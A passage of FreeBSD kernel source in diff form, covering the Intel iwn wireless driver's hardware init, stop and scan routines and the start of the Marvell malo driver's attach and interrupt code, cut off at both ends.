IWN_HW_IF_CONFIG_NIC_READY); for (ntries = 0; ntries < 5; ntries++) { if (IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_NIC_READY) return 0; DELAY(10); } /* Hardware not ready, force into ready state. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_PREPARE); for (ntries = 0; ntries < 15000; ntries++) { if (!(IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_PREPARE_DONE)) break; DELAY(10); } if (ntries == 15000) return ETIMEDOUT; /* Hardware should be ready now. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_NIC_READY); for (ntries = 0; ntries < 5; ntries++) { if (IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_NIC_READY) return 0; DELAY(10); } return ETIMEDOUT; } static int iwn_hw_init(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; int error, chnl, qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Clear pending interrupts. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); if ((error = iwn_apm_init(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not power ON adapter, error %d\n", __func__, error); return error; } /* Select VMAIN power source. */ if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_clrbits(sc, IWN_APMG_PS, IWN_APMG_PS_PWR_SRC_MASK); iwn_nic_unlock(sc); /* Perform adapter-specific initialization. */ if ((error = ops->nic_config(sc)) != 0) return error; /* Initialize RX ring. */ if ((error = iwn_nic_lock(sc)) != 0) return error; IWN_WRITE(sc, IWN_FH_RX_CONFIG, 0); IWN_WRITE(sc, IWN_FH_RX_WPTR, 0); /* Set physical address of RX ring (256-byte aligned). */ IWN_WRITE(sc, IWN_FH_RX_BASE, sc->rxq.desc_dma.paddr >> 8); /* Set physical address of RX status (16-byte aligned). */ IWN_WRITE(sc, IWN_FH_STATUS_WPTR, sc->rxq.stat_dma.paddr >> 4); /* Enable RX. */ IWN_WRITE(sc, IWN_FH_RX_CONFIG, IWN_FH_RX_CONFIG_ENA | IWN_FH_RX_CONFIG_IGN_RXF_EMPTY | /* HW bug workaround */ IWN_FH_RX_CONFIG_IRQ_DST_HOST | IWN_FH_RX_CONFIG_SINGLE_FRAME | IWN_FH_RX_CONFIG_RB_TIMEOUT(0) | IWN_FH_RX_CONFIG_NRBD(IWN_RX_RING_COUNT_LOG)); iwn_nic_unlock(sc); IWN_WRITE(sc, IWN_FH_RX_WPTR, (IWN_RX_RING_COUNT - 1) & ~7); if ((error = iwn_nic_lock(sc)) != 0) return error; /* Initialize TX scheduler. */ iwn_prph_write(sc, sc->sched_txfact_addr, 0); /* Set physical address of "keep warm" page (16-byte aligned). */ IWN_WRITE(sc, IWN_FH_KW_ADDR, sc->kw_dma.paddr >> 4); /* Initialize TX rings. */ for (qid = 0; qid < sc->ntxqs; qid++) { struct iwn_tx_ring *txq = &sc->txq[qid]; /* Set physical address of TX ring (256-byte aligned). */ IWN_WRITE(sc, IWN_FH_CBBC_QUEUE(qid), txq->desc_dma.paddr >> 8); } iwn_nic_unlock(sc); /* Enable DMA channels. */ for (chnl = 0; chnl < sc->ndmachnls; chnl++) { IWN_WRITE(sc, IWN_FH_TX_CONFIG(chnl), IWN_FH_TX_CONFIG_DMA_ENA | IWN_FH_TX_CONFIG_DMA_CREDIT_ENA); } /* Clear "radio off" and "commands blocked" bits. */ IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_RFKILL); IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_CMD_BLOCKED); /* Clear pending interrupts. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); /* Enable interrupt coalescing. */ IWN_WRITE(sc, IWN_INT_COALESCING, 512 / 8); /* Enable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); /* _Really_ make sure "radio off" bit is cleared! */ IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_RFKILL); IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_RFKILL); /* Enable shadow registers. */ if (sc->base_params->shadow_reg_enable) IWN_SETBITS(sc, IWN_SHADOW_REG_CTRL, 0x800fffff); if ((error = ops->load_firmware(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not load firmware, error %d\n", __func__, error); return error; } /* Wait at most one second for firmware alive notification. */ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "iwninit", hz)) != 0) { device_printf(sc->sc_dev, "%s: timeout waiting for adapter to initialize, error %d\n", __func__, error); return error; } /* Do post-firmware initialization. */ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return ops->post_alive(sc); } static void iwn_hw_stop(struct iwn_softc *sc) { int chnl, qid, ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); IWN_WRITE(sc, IWN_RESET, IWN_RESET_NEVO); /* Disable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, 0); IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_FH_INT, 0xffffffff); sc->sc_flags &= ~IWN_FLAG_USE_ICT; /* Make sure we no longer hold the NIC lock. */ iwn_nic_unlock(sc); /* Stop TX scheduler. */ iwn_prph_write(sc, sc->sched_txfact_addr, 0); /* Stop all DMA channels. */ if (iwn_nic_lock(sc) == 0) { for (chnl = 0; chnl < sc->ndmachnls; chnl++) { IWN_WRITE(sc, IWN_FH_TX_CONFIG(chnl), 0); for (ntries = 0; ntries < 200; ntries++) { if (IWN_READ(sc, IWN_FH_TX_STATUS) & IWN_FH_TX_STATUS_IDLE(chnl)) break; DELAY(10); } } iwn_nic_unlock(sc); } /* Stop RX ring. */ iwn_reset_rx_ring(sc, &sc->rxq); /* Reset all TX rings. */ for (qid = 0; qid < sc->ntxqs; qid++) iwn_reset_tx_ring(sc, &sc->txq[qid]); if (iwn_nic_lock(sc) == 0) { iwn_prph_write(sc, IWN_APMG_CLK_DIS, IWN_APMG_CLK_CTRL_DMA_CLK_RQT); iwn_nic_unlock(sc); } DELAY(5); /* Power OFF adapter. */ iwn_apm_stop(sc); } static void iwn_radio_on(void *arg0, int pending) { struct iwn_softc *sc = arg0; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (vap != NULL) { iwn_init(sc); ieee80211_init(vap); } } static void iwn_radio_off(void *arg0, int pending) { struct iwn_softc *sc = arg0; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); iwn_stop(sc); if (vap != NULL) ieee80211_stop(vap); /* Enable interrupts to get RF toggle notification. */ IWN_LOCK(sc); IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); IWN_UNLOCK(sc); } static void iwn_init_locked(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); IWN_LOCK_ASSERT(sc); if ((error = iwn_hw_prepare(sc)) != 0) { device_printf(sc->sc_dev, "%s: hardware not ready, error %d\n", __func__, error); goto fail; } /* Initialize interrupt mask to default value. */ sc->int_mask = IWN_INT_MASK_DEF; sc->sc_flags &= ~IWN_FLAG_USE_ICT; /* Check that the radio is not disabled by hardware switch. */ if (!(IWN_READ(sc, IWN_GP_CNTRL) & IWN_GP_CNTRL_RFKILL)) { device_printf(sc->sc_dev, "radio is disabled by hardware switch\n"); /* Enable interrupts to get RF toggle notifications. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); return; } /* Read firmware images from the filesystem. */ if ((error = iwn_read_firmware(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not read firmware, error %d\n", __func__, error); goto fail; } /* Initialize hardware and upload firmware. */ error = iwn_hw_init(sc); firmware_put(sc->fw_fp, FIRMWARE_UNLOAD); sc->fw_fp = NULL; if (error != 0) { device_printf(sc->sc_dev, "%s: could not initialize hardware, error %d\n", __func__, error); goto fail; } /* Configure adapter now that it is ready. */ if ((error = iwn_config(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not configure device, error %d\n", __func__, error); goto fail; } ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->watchdog_to, hz, iwn_watchdog, sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return; fail: iwn_stop_locked(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end in error\n",__func__); } static void iwn_init(void *arg) { struct iwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWN_LOCK(sc); iwn_init_locked(sc); IWN_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void iwn_stop_locked(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; IWN_LOCK_ASSERT(sc); sc->sc_is_scanning = 0; sc->sc_tx_timer = 0; callout_stop(&sc->watchdog_to); callout_stop(&sc->calib_to); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* Power OFF hardware. */ iwn_hw_stop(sc); } static void iwn_stop(struct iwn_softc *sc) { IWN_LOCK(sc); iwn_stop_locked(sc); IWN_UNLOCK(sc); } /* * Callback from net80211 to start a scan. */ static void iwn_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct iwn_softc *sc = ifp->if_softc; IWN_LOCK(sc); /* make the link LED blink while we're scanning */ iwn_set_led(sc, IWN_LED_LINK, 20, 2); IWN_UNLOCK(sc); } /* * Callback from net80211 to terminate a scan. */ static void iwn_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct iwn_softc *sc = ifp->if_softc; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); IWN_LOCK(sc); if (vap->iv_state == IEEE80211_S_RUN) { /* Set link LED to ON status if we are associated */ iwn_set_led(sc, IWN_LED_LINK, 0, 1); } IWN_UNLOCK(sc); } /* * Callback from net80211 to force a channel change. */ static void iwn_set_channel(struct ieee80211com *ic) { const struct ieee80211_channel *c = ic->ic_curchan; struct ifnet *ifp = ic->ic_ifp; struct iwn_softc *sc = ifp->if_softc; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); IWN_LOCK(sc); sc->sc_rxtap.wr_chan_freq = htole16(c->ic_freq); sc->sc_rxtap.wr_chan_flags = htole16(c->ic_flags); sc->sc_txtap.wt_chan_freq = htole16(c->ic_freq); sc->sc_txtap.wt_chan_flags = htole16(c->ic_flags); /* * Only need to set the channel in Monitor mode. AP scanning and auth * are already taken care of by their respective firmware commands. */ if (ic->ic_opmode == IEEE80211_M_MONITOR) { error = iwn_config(sc); if (error != 0) device_printf(sc->sc_dev, "%s: error %d settting channel\n", __func__, error); } IWN_UNLOCK(sc); } /* * Callback from net80211 to start scanning of the current channel. */ static void iwn_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell) { struct ieee80211vap *vap = ss->ss_vap; struct iwn_softc *sc = vap->iv_ic->ic_ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; int error; IWN_LOCK(sc); error = iwn_scan(sc, vap, ss, ic->ic_curchan); IWN_UNLOCK(sc); if (error != 0) ieee80211_cancel_scan(vap); } /* * Callback from net80211 to handle the minimum dwell time being met. * The intent is to terminate the scan but we just let the firmware * notify us when it's finished as we have no safe way to abort it. */ static void iwn_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void iwn_hw_reset(void *arg0, int pending) { struct iwn_softc *sc = arg0; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); iwn_stop(sc); iwn_init(sc); ieee80211_notify_radio(ic, 1); } #ifdef IWN_DEBUG #define IWN_DESC(x) case x: return #x #define COUNTOF(array) (sizeof(array) / sizeof(array[0])) /* * Translate CSR code to string */ static char *iwn_get_csr_string(int csr) { switch (csr) { IWN_DESC(IWN_HW_IF_CONFIG); IWN_DESC(IWN_INT_COALESCING); IWN_DESC(IWN_INT); IWN_DESC(IWN_INT_MASK); IWN_DESC(IWN_FH_INT); IWN_DESC(IWN_GPIO_IN); IWN_DESC(IWN_RESET); IWN_DESC(IWN_GP_CNTRL); IWN_DESC(IWN_HW_REV); IWN_DESC(IWN_EEPROM); IWN_DESC(IWN_EEPROM_GP); IWN_DESC(IWN_OTP_GP); IWN_DESC(IWN_GIO); IWN_DESC(IWN_GP_UCODE); IWN_DESC(IWN_GP_DRIVER); IWN_DESC(IWN_UCODE_GP1); IWN_DESC(IWN_UCODE_GP2); IWN_DESC(IWN_LED); IWN_DESC(IWN_DRAM_INT_TBL); IWN_DESC(IWN_GIO_CHICKEN); IWN_DESC(IWN_ANA_PLL); IWN_DESC(IWN_HW_REV_WA); IWN_DESC(IWN_DBG_HPET_MEM); default: return "UNKNOWN CSR"; } } /* * This function print firmware register */ static void iwn_debug_register(struct iwn_softc *sc) { int i; static const uint32_t csr_tbl[] = { IWN_HW_IF_CONFIG, IWN_INT_COALESCING, IWN_INT, IWN_INT_MASK, IWN_FH_INT, IWN_GPIO_IN, IWN_RESET, IWN_GP_CNTRL, IWN_HW_REV, IWN_EEPROM, IWN_EEPROM_GP, IWN_OTP_GP, IWN_GIO, IWN_GP_UCODE, IWN_GP_DRIVER, IWN_UCODE_GP1, IWN_UCODE_GP2, IWN_LED, IWN_DRAM_INT_TBL, IWN_GIO_CHICKEN, IWN_ANA_PLL, IWN_HW_REV_WA, IWN_DBG_HPET_MEM, }; DPRINTF(sc, IWN_DEBUG_REGISTER, "CSR values: (2nd byte of IWN_INT_COALESCING is IWN_INT_PERIODIC)%s", "\n"); for (i = 0; i < COUNTOF(csr_tbl); i++){ DPRINTF(sc, IWN_DEBUG_REGISTER," %10s: 0x%08x ", iwn_get_csr_string(csr_tbl[i]), IWN_READ(sc, csr_tbl[i])); if ((i+1) % 3 == 0) DPRINTF(sc, IWN_DEBUG_REGISTER,"%s","\n"); } DPRINTF(sc, IWN_DEBUG_REGISTER,"%s","\n"); } #endif diff --git a/sys/dev/malo/if_malo.c b/sys/dev/malo/if_malo.c index 5f1288975652..7817462be0c0 100644 --- a/sys/dev/malo/if_malo.c +++ b/sys/dev/malo/if_malo.c @@ -1,2292 +1,2292 @@ /*- * Copyright (c) 2008 Weongyo Jeong * Copyright (c) 2007 Marvell Semiconductor, Inc. * Copyright (c) 2007 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif #include "opt_malo.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include SYSCTL_NODE(_hw, OID_AUTO, malo, CTLFLAG_RD, 0, "Marvell 88w8335 driver parameters"); static int malo_txcoalesce = 8; /* # tx pkts to q before poking f/w*/ SYSCTL_INT(_hw_malo, OID_AUTO, txcoalesce, CTLFLAG_RW, &malo_txcoalesce, 0, "tx buffers to send at once"); TUNABLE_INT("hw.malo.txcoalesce", &malo_txcoalesce); static int malo_rxbuf = MALO_RXBUF; /* # rx buffers to allocate */ SYSCTL_INT(_hw_malo, OID_AUTO, rxbuf, CTLFLAG_RW, &malo_rxbuf, 0, "rx buffers allocated"); TUNABLE_INT("hw.malo.rxbuf", &malo_rxbuf); static int malo_rxquota = MALO_RXBUF; /* # max buffers to process */ SYSCTL_INT(_hw_malo, OID_AUTO, rxquota, CTLFLAG_RW, &malo_rxquota, 0, "max rx buffers to process per interrupt"); TUNABLE_INT("hw.malo.rxquota", &malo_rxquota); static int malo_txbuf = MALO_TXBUF; /* # tx buffers to allocate */ SYSCTL_INT(_hw_malo, OID_AUTO, txbuf, CTLFLAG_RW, &malo_txbuf, 0, "tx buffers allocated"); TUNABLE_INT("hw.malo.txbuf", &malo_txbuf); #ifdef MALO_DEBUG static int malo_debug = 0; SYSCTL_INT(_hw_malo, OID_AUTO, debug, CTLFLAG_RW, &malo_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.malo.debug", &malo_debug); enum { MALO_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ MALO_DEBUG_XMIT_DESC = 0x00000002, /* xmit descriptors */ MALO_DEBUG_RECV = 0x00000004, /* basic recv operation */ MALO_DEBUG_RECV_DESC = 0x00000008, /* recv descriptors */ MALO_DEBUG_RESET = 0x00000010, /* reset processing */ MALO_DEBUG_INTR = 0x00000040, /* ISR */ MALO_DEBUG_TX_PROC = 0x00000080, /* tx ISR proc */ MALO_DEBUG_RX_PROC = 0x00000100, /* rx ISR proc */ MALO_DEBUG_STATE = 0x00000400, /* 802.11 state transitions */ MALO_DEBUG_NODE = 0x00000800, /* node management */ MALO_DEBUG_RECV_ALL = 0x00001000, /* trace all frames (beacons) */ MALO_DEBUG_FW = 0x00008000, /* firmware */ MALO_DEBUG_ANY = 0xffffffff }; #define IS_BEACON(wh) \ ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | \ IEEE80211_FC0_SUBTYPE_MASK)) == \ (IEEE80211_FC0_TYPE_MGT|IEEE80211_FC0_SUBTYPE_BEACON)) #define IFF_DUMPPKTS_RECV(sc, wh) \ (((sc->malo_debug & MALO_DEBUG_RECV) && \ ((sc->malo_debug & MALO_DEBUG_RECV_ALL) || !IS_BEACON(wh))) || \ (sc->malo_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == \ (IFF_DEBUG|IFF_LINK2)) #define IFF_DUMPPKTS_XMIT(sc) \ ((sc->malo_debug & MALO_DEBUG_XMIT) || \ (sc->malo_ifp->if_flags & (IFF_DEBUG | IFF_LINK2)) == \ (IFF_DEBUG | IFF_LINK2)) #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->malo_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #endif static MALLOC_DEFINE(M_MALODEV, "malodev", "malo driver dma buffers"); static struct ieee80211vap *malo_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void malo_vap_delete(struct ieee80211vap *); static int malo_dma_setup(struct malo_softc *); static int malo_setup_hwdma(struct malo_softc *); static void malo_txq_init(struct malo_softc *, struct malo_txq *, int); static void malo_tx_cleanupq(struct malo_softc *, struct malo_txq *); static void malo_start(struct ifnet *); static void malo_watchdog(void *); static int malo_ioctl(struct ifnet *, u_long, caddr_t); static void malo_updateslot(struct ifnet *); static int malo_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void malo_scan_start(struct ieee80211com *); static void malo_scan_end(struct ieee80211com *); static void malo_set_channel(struct ieee80211com *); static int malo_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void malo_sysctlattach(struct malo_softc *); static void malo_announce(struct malo_softc *); static void malo_dma_cleanup(struct malo_softc *); static void malo_stop_locked(struct ifnet *, int); static int malo_chan_set(struct malo_softc *, struct ieee80211_channel *); static int malo_mode_init(struct malo_softc *); static void malo_tx_proc(void *, int); static void malo_rx_proc(void *, int); static void malo_init(void *); /* * Read/Write shorthands for accesses to BAR 0. Note that all BAR 1 * operations are done in the "hal" except getting H/W MAC address at * malo_attach and there should be no reference to them here. */ static uint32_t malo_bar0_read4(struct malo_softc *sc, bus_size_t off) { return bus_space_read_4(sc->malo_io0t, sc->malo_io0h, off); } static void malo_bar0_write4(struct malo_softc *sc, bus_size_t off, uint32_t val) { DPRINTF(sc, MALO_DEBUG_FW, "%s: off 0x%jx val 0x%x\n", __func__, (intmax_t)off, val); bus_space_write_4(sc->malo_io0t, sc->malo_io0h, off, val); } int malo_attach(uint16_t devid, struct malo_softc *sc) { int error; struct ieee80211com *ic; struct ifnet *ifp; struct malo_hal *mh; uint8_t bands; ifp = sc->malo_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->malo_dev, "can not if_alloc()\n"); return ENOSPC; } ic = ifp->if_l2com; MALO_LOCK_INIT(sc); callout_init_mtx(&sc->malo_watchdog_timer, &sc->malo_mtx, 0); /* set these up early for if_printf use */ if_initname(ifp, device_get_name(sc->malo_dev), device_get_unit(sc->malo_dev)); mh = malo_hal_attach(sc->malo_dev, devid, sc->malo_io1h, sc->malo_io1t, sc->malo_dmat); if (mh == NULL) { if_printf(ifp, "unable to attach HAL\n"); error = EIO; goto bad; } sc->malo_mh = mh; /* * Load firmware so we can get setup. We arbitrarily pick station * firmware; we'll re-load firmware as needed so setting up * the wrong mode isn't a big deal. */ error = malo_hal_fwload(mh, "malo8335-h", "malo8335-m"); if (error != 0) { if_printf(ifp, "unable to setup firmware\n"); goto bad1; } /* XXX gethwspecs() extracts correct informations? not maybe! */ error = malo_hal_gethwspecs(mh, &sc->malo_hwspecs); if (error != 0) { if_printf(ifp, "unable to fetch h/w specs\n"); goto bad1; } DPRINTF(sc, MALO_DEBUG_FW, "malo_hal_gethwspecs: hwversion 0x%x hostif 0x%x" "maxnum_wcb 0x%x maxnum_mcaddr 0x%x maxnum_tx_wcb 0x%x" "regioncode 0x%x num_antenna 0x%x fw_releasenum 0x%x" "wcbbase0 0x%x rxdesc_read 0x%x rxdesc_write 0x%x" "ul_fw_awakecookie 0x%x w[4] = %x %x %x %x", sc->malo_hwspecs.hwversion, sc->malo_hwspecs.hostinterface, sc->malo_hwspecs.maxnum_wcb, sc->malo_hwspecs.maxnum_mcaddr, sc->malo_hwspecs.maxnum_tx_wcb, sc->malo_hwspecs.regioncode, sc->malo_hwspecs.num_antenna, sc->malo_hwspecs.fw_releasenum, sc->malo_hwspecs.wcbbase0, sc->malo_hwspecs.rxdesc_read, sc->malo_hwspecs.rxdesc_write, sc->malo_hwspecs.ul_fw_awakecookie, sc->malo_hwspecs.wcbbase[0], sc->malo_hwspecs.wcbbase[1], sc->malo_hwspecs.wcbbase[2], sc->malo_hwspecs.wcbbase[3]); /* NB: firmware looks that it does not export regdomain info API. */ bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); sc->malo_txantenna = 0x2; /* h/w default */ sc->malo_rxantenna = 0xffff; /* h/w default */ /* * Allocate tx + rx descriptors and populate the lists. * We immediately push the information to the firmware * as otherwise it gets upset. */ error = malo_dma_setup(sc); if (error != 0) { if_printf(ifp, "failed to setup descriptors: %d\n", error); goto bad1; } error = malo_setup_hwdma(sc); /* push to firmware */ if (error != 0) /* NB: malo_setupdma prints msg */ goto bad2; sc->malo_tq = taskqueue_create_fast("malo_taskq", M_NOWAIT, taskqueue_thread_enqueue, &sc->malo_tq); taskqueue_start_threads(&sc->malo_tq, 1, PI_NET, "%s taskq", ifp->if_xname); TASK_INIT(&sc->malo_rxtask, 0, malo_rx_proc, sc); TASK_INIT(&sc->malo_txtask, 0, malo_tx_proc, sc); ifp->if_softc = sc; ifp->if_flags = IFF_SIMPLEX | IFF_BROADCAST | IFF_MULTICAST; ifp->if_start = malo_start; ifp->if_ioctl = malo_ioctl; ifp->if_init = malo_init; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; /* XXX not right but it's not used anywhere important */ ic->ic_phytype = IEEE80211_T_OFDM; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_TXPMGT /* capable of txpow mgt */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ ; /* * Transmit requires space in the packet for a special format transmit * record and optional padding between this record and the payload. * Ask the net80211 layer to arrange this when encapsulating * packets so we can add it efficiently. */ ic->ic_headroom = sizeof(struct malo_txrec) - sizeof(struct ieee80211_frame); /* call MI attach routine. */ ieee80211_ifattach(ic, sc->malo_hwspecs.macaddr); /* override default methods */ ic->ic_vap_create = malo_vap_create; ic->ic_vap_delete = malo_vap_delete; ic->ic_raw_xmit = malo_raw_xmit; ic->ic_updateslot = malo_updateslot; ic->ic_scan_start = malo_scan_start; ic->ic_scan_end = malo_scan_end; ic->ic_set_channel = malo_set_channel; sc->malo_invalid = 0; /* ready to go, enable int handling */ ieee80211_radiotap_attach(ic, &sc->malo_tx_th.wt_ihdr, sizeof(sc->malo_tx_th), MALO_TX_RADIOTAP_PRESENT, &sc->malo_rx_th.wr_ihdr, sizeof(sc->malo_rx_th), MALO_RX_RADIOTAP_PRESENT); /* * Setup dynamic sysctl's. */ malo_sysctlattach(sc); if (bootverbose) ieee80211_announce(ic); malo_announce(sc); return 0; bad2: malo_dma_cleanup(sc); bad1: malo_hal_detach(mh); bad: if_free(ifp); sc->malo_invalid = 1; return error; } static struct ieee80211vap * malo_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct malo_vap *mvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "multiple vaps not supported\n"); return NULL; } switch (opmode) { case IEEE80211_M_STA: if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; /* fall thru... */ case IEEE80211_M_MONITOR: break; default: if_printf(ifp, "%s mode not supported\n", ieee80211_opmode_name[opmode]); return NULL; /* unsupported */ } mvp = (struct malo_vap *) malloc(sizeof(struct malo_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (mvp == NULL) { if_printf(ifp, "cannot allocate vap state block\n"); return NULL; } vap = &mvp->malo_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ mvp->malo_newstate = vap->iv_newstate; vap->iv_newstate = malo_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void malo_vap_delete(struct ieee80211vap *vap) { struct malo_vap *mvp = MALO_VAP(vap); ieee80211_vap_detach(vap); free(mvp, M_80211_VAP); } int malo_intr(void *arg) { struct malo_softc *sc = arg; struct malo_hal *mh = sc->malo_mh; uint32_t status; if (sc->malo_invalid) { /* * The hardware is not ready/present, don't touch anything. * Note this can happen early on if the IRQ is shared. */ DPRINTF(sc, MALO_DEBUG_ANY, "%s: invalid; ignored\n", __func__); return (FILTER_STRAY); } /* * Figure out the reason(s) for the interrupt. */ malo_hal_getisr(mh, &status); /* NB: clears ISR too */ if (status == 0) /* must be a shared irq */ return (FILTER_STRAY); DPRINTF(sc, MALO_DEBUG_INTR, "%s: status 0x%x imask 0x%x\n", __func__, status, sc->malo_imask); if (status & MALO_A2HRIC_BIT_RX_RDY) taskqueue_enqueue_fast(sc->malo_tq, &sc->malo_rxtask); if (status & MALO_A2HRIC_BIT_TX_DONE) taskqueue_enqueue_fast(sc->malo_tq, &sc->malo_txtask); if (status & MALO_A2HRIC_BIT_OPC_DONE) malo_hal_cmddone(mh); if (status & MALO_A2HRIC_BIT_MAC_EVENT) ; if (status & MALO_A2HRIC_BIT_RX_PROBLEM) ; if (status & MALO_A2HRIC_BIT_ICV_ERROR) { /* TKIP ICV error */ sc->malo_stats.mst_rx_badtkipicv++; } #ifdef MALO_DEBUG if (((status | 